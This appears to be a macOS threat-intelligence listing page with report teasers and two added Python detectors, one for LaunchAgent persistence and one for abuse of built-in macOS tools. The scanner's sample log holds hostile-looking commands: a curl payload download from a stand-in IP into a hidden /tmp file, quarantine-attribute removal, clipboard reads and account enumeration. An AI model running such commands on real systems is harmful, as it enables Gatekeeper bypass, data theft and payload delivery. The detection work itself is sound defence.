XLoader has returned on macOS as a native C/Objective-C variant that masquerades as OfficeNote and is signed with an Apple developer certificate so that it passes signature checks. It drops a payload, establishes persistence via a Launch Agent, exfiltrates browser and clipboard data, and…
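The teaser above names Launch Agent persistence as one of the behaviours. As an added example (not code from the article or from the malware it describes), the following Python triages a LaunchAgent plist for the indicators a responder would look at first: a label squatting on the `com.apple.` namespace in a user-writable agent, a program path under the user's home or inside a hidden directory, `RunAtLoad`/`KeepAlive`, and output silenced to `/dev/null`. The plist is constructed for the example; the label, path and scoring thresholds are assumptions, not values from the page.

```python
"""Triage a macOS LaunchAgent plist for persistence indicators.

Added example; the plist below is constructed, not a real XLoader artifact.
"""
import plistlib

# Constructed sample modelled on what a dropper might write to ~/Library/LaunchAgents.
SAMPLE_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
  <key>Label</key><string>com.apple.officenote.helper</string>
  <key>ProgramArguments</key>
  <array><string>/Users/alice/Library/Application Support/.OfficeNote/helper</string></array>
  <key>RunAtLoad</key><true/>
  <key>KeepAlive</key><true/>
  <key>StandardOutPath</key><string>/dev/null</string>
  <key>StandardErrorPath</key><string>/dev/null</string>
</dict>
</plist>
"""

# Locations from which a legitimately installed agent would normally run (assumption).
TRUSTED_PREFIXES = ("/System/", "/usr/bin/", "/usr/libexec/", "/usr/sbin/", "/Applications/")


def _has_hidden_component(path):
    """True if any directory or file component of the path starts with a dot."""
    return any(p.startswith(".") and p not in (".", "..") for p in path.split("/"))


def triage(plist_bytes, in_user_launch_agents=True):
    """Return a dict with the program path, a list of reason tags and a score.

    The score is a simple count of indicators; anything >= 3 is worth a closer look
    (threshold is an assumption for this example, not a published rule).
    """
    d = plistlib.loads(plist_bytes)
    reasons = []

    program = d.get("Program")
    if program is None:
        args = d.get("ProgramArguments") or []
        program = args[0] if args else None
    if program is None:
        reasons.append("no_program")
    else:
        if program.startswith("/Users/") or program.startswith("/tmp/") or program.startswith("/private/tmp/"):
            reasons.append("user_or_temp_program_path")
        if _has_hidden_component(program):
            reasons.append("hidden_program_path")
        if not program.startswith(TRUSTED_PREFIXES):
            reasons.append("program_outside_trusted_prefixes")

    label = d.get("Label", "")
    # Apple's own agents live in /System/Library/LaunchAgents; a com.apple.* label
    # in a user-writable LaunchAgents directory is a classic impersonation sign.
    if in_user_launch_agents and label.startswith("com.apple."):
        reasons.append("apple_namespace_label")

    if d.get("RunAtLoad") is True:
        reasons.append("run_at_load")
    if d.get("KeepAlive") not in (None, False):
        reasons.append("keep_alive")
    if d.get("StandardOutPath") == "/dev/null" and d.get("StandardErrorPath") == "/dev/null":
        reasons.append("output_silenced")

    return {"label": label, "program": program, "reasons": reasons, "score": len(reasons)}


if __name__ == "__main__":
    result = triage(SAMPLE_PLIST)
    print(result["label"], result["program"], result["score"])
    for r in result["reasons"]:
        print("  -", r)
```

In practice you would run `triage` over every plist under `~/Library/LaunchAgents` and `/Library/LaunchAgents` on a suspect host and sort by score; the indicators are deliberately generic so the same check applies to the persistence variants in the other macOS write-ups listed on this page.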
Tag: MACOS
In July 2023, Mandiant Consulting responded to a supply chain compromise affecting a US-based software solutions entity. We believe the compromise ultimately began as a result of a sophisticated spear phishing campaign aimed at JumpCloud, a zero-trust directory platform service used for identity and access management. JumpCloud reported this unauthorized access…
JPCERT/CC details a DangerousPassword–linked campaign that targets developers in cryptocurrency exchanges across Windows, macOS, and Linux using Python and Node.js-based malware. The lifecycle includes multi-stage downloads, C2 beacons, and DLL sideloading, wi…
Lab52 detects a maldoc-based campaign targeting Chinese-speaking users, delivered via Chinese phishing and designed around a resume decoy. While the infection chain shares some traits with APT29, it features significant differences (Chinese-language decoy, pro…
TA453 (Charming Kitten) expands its espionage toolkit with new file types and cross-platform Mac malware, deploying LNK infection chains and a PowerShell backdoor named GorjolEcho. Proofpoint and partners disrupted the operation, but TA453 continues targeting …
Neo_Net runs a global eCrime campaign targeting thousands of bank clients, focusing on Spanish and Chilean banks, from June 2021 to April 2023. The operation includes Ankarex Smishing-as-a-Service, phishing panels, and Android trojans to exfiltrate data via Te…
Elastic Security Labs has detected a new variant of the RustBucket malware targeting macOS, with added persistence and signature-reduction tactics in active development. The REF9135 operations attributed to the Lazarus Group (DPRK) show shifting infrastructure…
JokerSpy is a multi-stage macOS spyware campaign described by BitDefender and Elastic, featuring a trojanized QR code generator (QRLog), cross-platform backdoors (shared.dat and sh.py), and a macOS stager (xcc). The actors show a likely financially motivated e…
During routine detection maintenance, our Mac researchers stumbled upon a small set of files with backdoor capabilities that seem to form part of a more complex malware toolkit. The following analysis is incomplete, as we are trying to identify the puzzle pieces that are still missing.
As of now, these samples are still largely undetected and very little information is available about any of them. The earliest mention we could find is an anonymous April 18 upload on VirusTotal (IoC A), as well
This article documents how legitimate macOS binaries (LOOBins) such as dscl, osascript/pbpaste, xattr, and curl are abused for discovery, clipboard theft, Gatekeeper bypass, and C2. It provides command examples and detection queries customers can use with EDR/…
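As an added example (not the article's own commands or queries), the Python below runs the detection idea described in that teaser over constructed process-execution events: it parses each command line and flags the four abuse patterns named there, namely `dscl` user enumeration, `xattr` removal of the quarantine attribute, clipboard reads via `pbpaste`/`osascript`, and `curl` downloads into staging locations or from IP-literal hosts. The log format, the severities and the specific tokens matched are assumptions chosen for the example; tune them to your EDR's field names before use.

```python
"""Flag suspicious use of legitimate macOS binaries (LOOBins) in process logs.

Added example; the log lines below are constructed, not from any real incident.
Assumed event format per line: <timestamp> <user> <parent_process> <command line>
"""
import re
import shlex
from dataclasses import dataclass

SAMPLE_LOG = """\
2023-07-10T09:01:02Z alice loginwindow /usr/bin/dscl . -list /Users UniqueID
2023-07-10T09:01:05Z alice Terminal /usr/bin/xattr -l /Users/alice/Downloads/report.pdf
2023-07-10T09:02:11Z alice OfficeNote /usr/bin/xattr -d com.apple.quarantine "/Users/alice/Library/Application Support/.helper"
2023-07-10T09:02:14Z alice OfficeNote /usr/bin/osascript -e 'do shell script "pbpaste"'
2023-07-10T09:02:20Z alice OfficeNote /usr/bin/curl -s -o /tmp/.update http://198.51.100.23/u
2023-07-10T09:03:00Z alice Terminal /usr/bin/curl -sSL https://example.com/index.html
"""

LOG_RE = re.compile(r"^(\S+)\s+(\S+)\s+(\S+)\s+(.*)$")
IP_HOST_RE = re.compile(r"^https?://(\d{1,3}\.){3}\d{1,3}(:\d+)?(/|$)")
STAGING_DIRS = ("/tmp/", "/private/tmp/", "/var/tmp/", "/private/var/tmp/")


@dataclass(frozen=True)
class Finding:
    timestamp: str
    user: str
    parent: str
    technique: str
    severity: str
    command: str


def _is_hidden_path(path):
    return any(p.startswith(".") and p not in (".", "..") for p in path.split("/"))


def classify(argv):
    """Return (technique, severity) for one parsed command line, or None if benign."""
    if not argv:
        return None
    binary = argv[0].rsplit("/", 1)[-1]
    args = argv[1:]

    # Discovery: enumerating local accounts through the directory service CLI.
    if binary == "dscl" and "-list" in args and any(a.startswith("/Users") for a in args):
        return ("discovery", "low")

    # Gatekeeper bypass: stripping the quarantine attribute (or clearing all xattrs).
    if binary == "xattr" and ("-c" in args or ("-d" in args and "com.apple.quarantine" in args)):
        return ("gatekeeper_bypass", "high")

    # Clipboard theft: direct pbpaste or an AppleScript that shells out to it.
    if binary == "pbpaste":
        return ("clipboard_theft", "medium")
    if binary == "osascript":
        script = " ".join(args)
        if "pbpaste" in script or "the clipboard" in script:
            return ("clipboard_theft", "medium")

    # Download/C2: curl writing into a staging dir or hidden file, or talking to a bare IP.
    if binary == "curl":
        out = None
        for i, a in enumerate(args):
            if a in ("-o", "--output") and i + 1 < len(args):
                out = args[i + 1]
            elif a.startswith("-o") and not a.startswith("--") and len(a) > 2:
                out = a[2:]  # handles the glued form "-o/tmp/x"
        ip_host = any(IP_HOST_RE.match(a) for a in args)
        if out is not None and (out.startswith(STAGING_DIRS) or _is_hidden_path(out) or ip_host):
            return ("staged_download", "high")
        if ip_host:
            return ("staged_download", "medium")
    return None


def scan_log(text):
    """Parse every event line and return the list of Findings, in log order."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line.strip())
        if not m:
            continue
        ts, user, parent, cmd = m.groups()
        try:
            argv = shlex.split(cmd)
        except ValueError:  # unbalanced quotes: fall back to a naive split
            argv = cmd.split()
        hit = classify(argv)
        if hit:
            findings.append(Finding(ts, user, parent, hit[0], hit[1], cmd))
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f.timestamp} [{f.severity:6}] {f.technique:18} parent={f.parent} :: {f.command}")
```

Note that the parent process is carried through on purpose: the same `xattr -d com.apple.quarantine` is routine when typed in Terminal by a developer but much more interesting when its parent is a freshly downloaded app, so a real rule should weight the parent rather than the binary alone. Combined short flags (for example `-so`) are not expanded here; add that if your telemetry shows them.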
JPCERT/CC highlights ongoing DangerousPassword campaigns against Japanese cryptocurrency exchanges, detailing four attack patterns: CHM files via LinkedIn, OneNote files, VHD-delivered payloads, and macOS targeting. The operators use social engineering, script…
ASEC reports SparkRAT was found distributed inside a VPN installer, indicating a supply-chain style compromise. The dropper creates SparkRAT in a local path, registers it for persistence, and enables remote control, information theft, and other malicious actio…
Atomic Stealer is a macOS infostealer sold via Telegram with multiple variants (A, B, C) and a web panel for campaign management. The article details how each variant operates, what data it targets (keychains, crypto wallets, browser data), and provides indica…
Checkpoint Research tracks how ROKRAT’s deployment has evolved into LNK-based, multi-stage infection chains that bypass macro restrictions, showing a shift from documents with macros to oversized LNK loaders. The campaigns target South Korean affairs, link to …
Cyble researchers reveal a Golang-based macOS stealer named Atomic macOS Stealer (AMOS) advertised on Telegram, designed to exfiltrate a wide range of victim data. The malware collects keychain passwords, system information, Desktop/Documents files, macOS pass…